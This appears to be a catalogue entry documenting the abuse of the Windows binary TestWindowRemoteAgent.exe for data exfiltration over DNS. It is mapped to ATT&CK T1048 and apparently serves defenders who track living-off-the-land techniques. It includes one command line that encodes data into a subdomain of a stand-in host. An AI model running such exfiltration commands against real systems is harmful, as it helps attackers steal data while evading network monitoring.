.. /TestWindowRemoteAgent.exe
Star

Upload

TestWindowRemoteAgent.exe is the command-line tool to establish RPC

Paths:

Acknowledgements:

Detections:

Upload

  1. Sends DNS query for open connection to any host, enabling exfiltration over DNS

    TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
    Use case
    Attackers may utilize this to exfiltrate data over DNS
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1048